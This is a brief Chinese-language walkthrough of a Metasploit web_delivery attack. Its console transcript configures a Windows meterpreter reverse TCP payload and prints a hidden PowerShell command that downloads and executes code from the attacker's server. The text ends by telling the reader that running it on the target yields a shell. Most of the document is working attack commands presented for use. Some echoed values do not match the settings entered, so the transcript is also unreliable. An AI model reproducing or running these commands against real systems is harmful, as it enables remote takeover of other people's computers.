首先选中模块
use exploit/multi/script/web_delivery
root@kali:~# msfconsole
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.4.95
lhost => 192.168.17.131
msf exploit(web_delivery) > set lport 9999
lport => 9999
msf exploit(web_delivery) > set srvport 8888
srvport => 8888
msf exploit(web_delivery) > set uripath /
uripath => /
msf exploit(web_delivery) > exploit
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.4.95:9999
[*] Using URL: http://0.0.0.0:8888/
[*] Local IP: http://192.168.4.95:8888/
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring('http://192.168.4.95:8888/');
复制代码上传至目标,即可返回shell。